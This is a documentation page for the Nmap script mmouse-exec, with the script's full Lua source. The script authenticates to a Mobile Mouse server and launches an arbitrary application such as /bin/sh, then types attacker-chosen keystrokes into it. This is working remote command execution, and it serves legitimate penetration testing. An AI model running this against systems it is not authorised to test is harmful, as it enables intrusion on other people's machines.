<html><head><style>body {font-family: verdana;font-size: 0.7em;} tr {font-family: verdana;font-size: 0.7em;}</style></head><body>
<h3>File mmouse-exec</h3>
<b>Script types:</b> portrule<br/>
<b>Categories:</b> auth<br/>
<b>Author:</b> Patrik Karlsson<br/>
<b>License:</b> <a href="https://nmap.org/book/man-legal.html" target=_blank>https://nmap.org/book/man-legal.html</a><br/>
<b>Download:</b> <a href="https://svn.nmap.org/nmap/scripts/mmouse-exec.nse">https://svn.nmap.org/nmap/scripts/mmouse-exec.nse</a><br/>
<h3>Summary</h3>
<p>Connects to an RPA Tech Mobile Mouse server, starts an application and sends a sequence of keys to it. Any application that the user has access to can be started and the key sequence is sent to the application after it has been started.</p>
<p>The Mobile Mouse server runs on OS X, Windows and Linux and enables remote control of the keyboard and mouse from an iOS device. For more information: http://mobilemouse.com/</p>
<p>The script has only been tested against OS X and will detect the remote OS and abort unless the OS is detected as Mac.</p>
<h3>Arguments</h3>
<table>
<tr><td>creds.global:</td><td>See the documentation for the <a href="nmap/libraries/creds.html">creds</a> library.</td></tr>
<tr><td>mmouse-exec.application:</td><td>The application which is to be started at the server</td></tr>
<tr><td>mmouse-exec.delay:</td><td>Delay in seconds to wait before sending the key sequence. (default: 3 seconds)</td></tr>
<tr><td>mmouse-exec.password:</td><td>The password needed to connect to the mobile mouse server</td></tr>
<tr><td>mmouse-exec.keys:</td><td>The key sequence to send to the started application</td></tr>
<tr><td>creds.[service]:</td><td>See the documentation for the <a href="nmap/libraries/creds.html">creds</a> library.</td></tr>
</table>
<h3>Usage</h3>
<pre>nmap -p 51010 &lt;host&gt; --script mmouse-exec \
  --script-args application=&#39;/bin/sh&#39;,keys=&#39;ping -c 5 127.0.0.1&#39;</pre>
<h3>Output</h3>
<pre>PORT      STATE SERVICE REASON
51010/tcp open  unknown syn-ack
| mmouse-exec:
|_  Attempted to start application &quot;/bin/sh&quot; and sent &quot;ping -c 5 127.0.0.1&quot;</pre>
<h3>Requirements</h3>
<ul>
<li><a href="nmap/libraries/creds.htm">creds</a></li>
<li><a href="nmap/libraries/match.htm">match</a></li>
<li><a href="nmap/libraries/nmap.htm">nmap</a></li>
<li><a href="nmap/libraries/shortport.htm">shortport</a></li>
<li><a href="nmap/libraries/stdnse.htm">stdnse</a></li>
</ul>
<h3>Code</h3>
<pre>local creds = require &quot;creds&quot;
local match = require &quot;match&quot;
local nmap = require &quot;nmap&quot;
local shortport = require &quot;shortport&quot;
local stdnse = require &quot;stdnse&quot;

description = [[
Connects to an RPA Tech Mobile Mouse server, starts an application and
sends a sequence of keys to it. Any application that the user has
access to can be started and the key sequence is sent to the
application after it has been started.

The Mobile Mouse server runs on OS X, Windows and Linux and enables remote
control of the keyboard and mouse from an iOS device. For more information:
http://mobilemouse.com/

The script has only been tested against OS X and will detect the remote OS
and abort unless the OS is detected as Mac.
]]

---
-- @usage
-- nmap -p 51010 &lt;host&gt; --script mmouse-exec \
--   --script-args application=&#39;/bin/sh&#39;,keys=&#39;ping -c 5 127.0.0.1&#39;
--
-- @output
-- PORT      STATE SERVICE REASON
-- 51010/tcp open  unknown syn-ack
-- | mmouse-exec:
-- |_  Attempted to start application &quot;/bin/sh&quot; and sent &quot;ping -c 5 127.0.0.1&quot;
--
-- @args mmouse-exec.password The password needed to connect to the mobile
--       mouse server
-- @args mmouse-exec.application The application which is to be started at the
--       server
-- @args mmouse-exec.keys The key sequence to send to the started application
-- @args mmouse-exec.delay Delay in seconds to wait before sending the key
--       sequence. (default: 3 seconds)
--

author = &quot;Patrik Karlsson&quot;
categories = {&quot;intrusive&quot;}
dependencies = {&quot;mmouse-brute&quot;}


local arg_password = stdnse.get_script_args(SCRIPT_NAME .. &#39;.password&#39;)
local arg_app      = stdnse.get_script_args(SCRIPT_NAME .. &#39;.application&#39;)
local arg_keys     = stdnse.get_script_args(SCRIPT_NAME .. &#39;.keys&#39;)
local arg_delay    = stdnse.get_script_args(SCRIPT_NAME .. &#39;.delay&#39;) or 3

portrule = shortport.port_or_service(51010, &quot;mmouse&quot;, &quot;tcp&quot;)

local function receiveData(socket, cmd)
  local status, data = &quot;&quot;
  repeat
    status, data = socket:receive_buf(match.pattern_limit(&quot;\04&quot;, 2048), true)
    if ( not(status) ) then
      return false, &quot;Failed to receive data from server&quot;
    end
  until( cmd == nil or data:match(&quot;^&quot; .. cmd) )
  return true, data
end

local function authenticate(socket, password)
  local devid = &quot;0123456789abcdef0123456789abcdef0123456&quot;
  local devname = &quot;Lord Vaders iPad&quot;
  local suffix = &quot;2&quot;..&quot;\30&quot;..&quot;2&quot;..&quot;\04&quot;
  local auth = (&quot;CONNECT\30%s\30%s\30%s\30%s&quot;):format(password, devid, devname, suffix)

  local status = socket:send(auth)
  if ( not(status) ) then
    return false, &quot;Failed to send data to server&quot;
  end

  local status, data = receiveData(socket)
  if ( not(status) ) then
    return false, &quot;Failed to receive data from server&quot;
  end

  local success, os = data:match(&quot;^CONNECTED\30([^\30]*)\30([^\30]*)&quot;)

  if ( success == &quot;YES&quot; ) then
    if ( os ~= &#39;MAC&#39; ) then
      return false, &quot;Non MAC platform detected, script has only been tested on MAC&quot;
    end
    if ( not(socket:send(&quot;SETOPTION\30PRESENTATION\30&quot;..&quot;1\04&quot;)) ) then
      return false, &quot;Failed to send request to server&quot;
    end
    if ( not(socket:send(&quot;SETOPTION\30CLIPBOARDSYNC\30&quot;..&quot;1\04&quot;)) ) then
      return false, &quot;Failed to send request to server&quot;
    end
    return true
  end
  return false, &quot;Authentication failed&quot;
end

local function processSwitchMode(socket, swmode)
  local m, o, a1, a2, p = swmode:match(&quot;^(.-)\30(.-)\30(.-)\30(.-)\30(.-)\04$&quot;)
  if ( m ~= &quot;SWITCHMODE&quot;) then
    stdnse.debug1(&quot;Unknown SWITCHMODE: %s %s&quot;, m, o)
    return false, &quot;Failed to parse SWITCHMODE&quot;
  end

  local str = (&quot;SWITCHED\30%s\30%s\30%s\04&quot;):format(o, a1, a2)
  local status = socket:send(str)
  if ( not(status) ) then
    return false, &quot;Failed to send data to server&quot;
  end
  return true
end

local function executeCmd(socket, app, keys)
  local exec = (&quot;SENDPROGRAMACTION\30RUN\30%s\04&quot;):format(app)
  local status = socket:send(exec)
  if ( not(status) ) then
    return false, &quot;Failed to send data to server&quot;
  end

  local status, data = receiveData(socket)
  if ( not(status) ) then
    return false, &quot;Failed to receive data from server&quot;
  end

  if ( arg_delay ) then
    stdnse.sleep(tonumber(arg_delay))
  end

  if ( keys ) then
    local cmd = (&quot;KEYSTRING\30%s\n\04&quot;):format(keys)
    if ( not(socket:send(cmd)) ) then
      return false, &quot;Failed to send data to the server&quot;
    end
  end
  return true
end

local function fail(err) return stdnse.format_output(false, err) end

action = function(host, port)

  local c = creds.Credentials:new(creds.ALL_DATA, host, port)
  local credentials = c:getCredentials(creds.State.VALID + creds.State.PARAM)()
  local password = arg_password or (credentials and credentials.pass) or &quot;&quot;

  if ( not(arg_app) ) then
    return fail((&quot;No application was specified (see %s.application)&quot;):format(SCRIPT_NAME))
  end

  if ( not(arg_keys) ) then
    return fail((&quot;No keys were specified (see %s.keys)&quot;):format(SCRIPT_NAME))
  end

  local socket = nmap.new_socket()
  socket:set_timeout(10000)
  local status, err = socket:connect(host, port)
  if ( not(status) ) then
    return fail(&quot;Failed to connect to server&quot;)
  end

  status, err = authenticate(socket, password)
  if ( not(status) ) then
    return fail(err)
  end

  local data
  status, data = receiveData(socket, &quot;SWITCHMODE&quot;)
  if ( not(status) ) then
    return fail(&quot;Failed to receive expected response from server&quot;)
  end

  if ( not(processSwitchMode(socket, data)) ) then
    return fail(&quot;Failed to process SWITCHMODE command&quot;)
  end

  if ( not(executeCmd(socket, arg_app, arg_keys)) ) then
    return fail(&quot;Failed to execute application&quot;)
  end

  return (&quot;\n  Attempted to start application \&quot;%s\&quot; and sent \&quot;%s\&quot;&quot;):format(arg_app, arg_keys)
end</pre>
